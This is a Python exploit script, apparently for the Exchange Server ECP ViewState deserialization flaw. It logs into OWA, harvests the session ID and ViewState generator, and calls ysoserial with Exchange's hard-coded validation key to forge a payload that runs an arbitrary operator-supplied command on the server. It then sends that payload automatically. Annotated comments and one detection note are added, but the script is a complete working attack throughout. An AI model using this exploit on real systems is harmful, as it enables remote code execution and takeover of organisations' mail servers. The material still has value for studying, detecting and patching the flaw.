# encoding: UTF-8 | |
import requests | |
import argparse | |
import re | |
import sys | |
import os | |
import urllib3 | |
from urllib.parse import urlparse | |
from urllib.parse import quote | |
# Silence the InsecureRequestWarning that urllib3 would otherwise print on
# every request made with verify=False.
urllib3.disable_warnings()
# Directory that is expected to contain ysoserial.exe, resolved relative to
# this script's own location (forward slash kept regardless of platform).
ysoserial_path = "{}/ysoserial/".format(os.path.abspath(os.path.dirname(__file__)))
# One shared session so the cookies set during login are sent on every
# later request made by this script.
session = requests.Session()
def get_value(url, user, pwd):
    """Log into OWA with the supplied credentials and collect the values the
    ViewState payload is built from.

    Args:
        url: OWA URL (e.g. ``http://host/owa``). Its scheme and netloc become
            ``base_url``; the full value is also sent as the ``destination``
            form field of the login POST.
        user: login name, sent unchanged as the ``username`` form field.
        pwd: password, sent unchanged as the ``password`` form field.

    Returns:
        ``(view, key, base_url)``: ``view`` is the ``__VIEWSTATEGENERATOR``
        scraped from ``/ecp/default.aspx`` (or the hard-coded fallback),
        ``key`` is the ``ASP.NET_SessionId`` cookie value or ``None`` when the
        session holds no such cookie, ``base_url`` is ``scheme://netloc``.

    Side effects:
        Prints progress to stdout and calls ``sys.exit(1)`` when the login is
        rejected or the login request raises. Every request is made with
        ``verify=False``, i.e. TLS certificate validation is disabled.
    """
    print("[*] Tring to login owa...")
    tmp = urlparse(url)
    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
    # Form fields of the OWA logon page; user and pwd are interpolated as-is.
    paramsPost = {
        "password": ""+pwd+"",
        "isUtf8": "1",
        "passwordText": "",
        "trusted": "4",
        "destination": ""+url+"",
        "flags": "4",
        "forcedownlevel": "0",
        "username": ""+user+""
    }
    # Browser-like headers; the two cookies are sent via a raw Cookie header
    # rather than through the session's cookie jar.
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PrivateComputer=true; PBack=0"
    }
    # NOTE: this dict is built but never referenced; the same two values are
    # already carried by the "Cookie" header above.
    cookies = {
        "PBack": "0",
        "PrivateComputer": "true"
    }
    login_url = base_url + '/owa/auth.owa'
    print("[+] Login url: {}".format(login_url))
    try:
        # verify=False: certificate errors on the target are ignored.
        login = session.post(login_url, data=paramsPost, headers=headers, verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
        # NOTE(review): 'and' binds tighter than 'or', so this evaluates as
        #   ("reason=" in login.text) or (("reason=" in login.url) and ("owaLoading" in login.text))
        # confirm that grouping is the intended failure test.
        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
            print("[!] Login Incorrect, please try again with a different account..")
            sys.exit(1)
    except Exception as e:
        # Any request error (DNS, connect, timeout, TLS) ends the process here.
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    print("[+] Login successfully! ")
    try:
        print("[*] Tring to get __VIEWSTATEGENERATOR...")
        target_url = "{}/ecp/default.aspx".format(base_url)
        new_response = session.get(target_url, verify=False, timeout=15)
        # First match of the hidden __VIEWSTATEGENERATOR field in the ECP page;
        # [0] raises IndexError when the field is absent.
        view = re.compile(
            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
    except:
        # Bare except: a failed request, a non-200 page or a regex miss all
        # silently fall back to this fixed generator value.
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
    try:
        print("[*] Tring to get ASP.NET_SessionId....")
        # Read from the session cookie jar populated by the requests above.
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done! ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        # The message says "Exit.." but this branch only returns key=None;
        # it is the caller that decides whether to stop.
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
    return view, key, base_url
def ysoserial(cmd):
    """Run a ysoserial command line from ``ysoserial_path`` and return the
    last line it printed.

    ``cmd`` is concatenated verbatim onto ``ysoserial_path`` and handed to the
    platform shell through ``os.popen``, so it must already be a complete and
    correctly quoted command line. Raises ``IndexError`` when the process
    produces no output. The pipe object is not explicitly closed.
    """
    full_cmd = "{}{}".format(ysoserial_path, cmd)
    output_lines = os.popen(full_cmd).readlines()
    return output_lines[-1]
def main():
    """Command-line entry point: log in, build the ViewState payload, send it.

    Parses ``-s/--server``, ``-u/--user``, ``-p/--password``, ``-c/--cmd`` and
    the optional ``-e/--encrypt`` flag, exits with status 1 when no
    ``ASP.NET_SessionId`` cookie was obtained, then issues a GET to
    ``/ecp/default.aspx`` carrying the generated payload in the
    ``__VIEWSTATE`` query parameter. An HTTP 500 reply is reported as
    "Maybe success"; any other status prints nothing.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL: http://ip/owa")
    parser.add_argument("-u", "--user", required=True, help="Domain Login: domain\\user")
    parser.add_argument("-p", "--password", required=True, help="Domain Password")
    parser.add_argument("-c", "--cmd", help="Command to EXEC", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)
    args = parser.parse_args()
    url = args.server
    print("[*] Start to exploit..")
    user = args.user
    pwd = args.password
    command = args.cmd
    view, key, base_url = get_value(url, user, pwd)
    if key is None:
        # Dead assignment: the process exits on the next line, so 'test' is
        # never used.
        key = 'test'
        sys.exit(1)
    # ysoserial command line. The validation key here (and the 3DES decryption
    # key added under --encrypt) are hard-coded, so the forged ViewState only
    # passes MAC validation on a server whose machineKey still uses these
    # static values; a server configured with its own keys should reject it
    # (not verified here). `command` and `view` are interpolated unescaped
    # inside the double quotes of a shell command line.
    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy --isdebug""".format(command,view,key)
    if args.encrypt:
        ex_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
    print("\n"+ex_payload)
    out_payload = ysoserial(ex_payload)
    # Encrypted payloads are sent with an empty __VIEWSTATEENCRYPTED marker and
    # no generator; unencrypted ones carry __VIEWSTATEGENERATOR explicitly.
    # Detection note: either form is a GET to /ecp/default.aspx with
    # __VIEWSTATE in the query string, from a session that just authenticated
    # via /owa/auth.owa.
    if args.encrypt:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
    else:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    status = session.get(final_exp,verify=False,timeout=15)
    # Only a 500 is reported; other status codes are silently ignored.
    if status.status_code==500:
        print("[*] Status code: %i, Maybe success!" % status.status_code)
if __name__ == "__main__":
    # Run only when executed as a script; importing the module still performs
    # the module-level setup (warning suppression, path, session) above.
    main()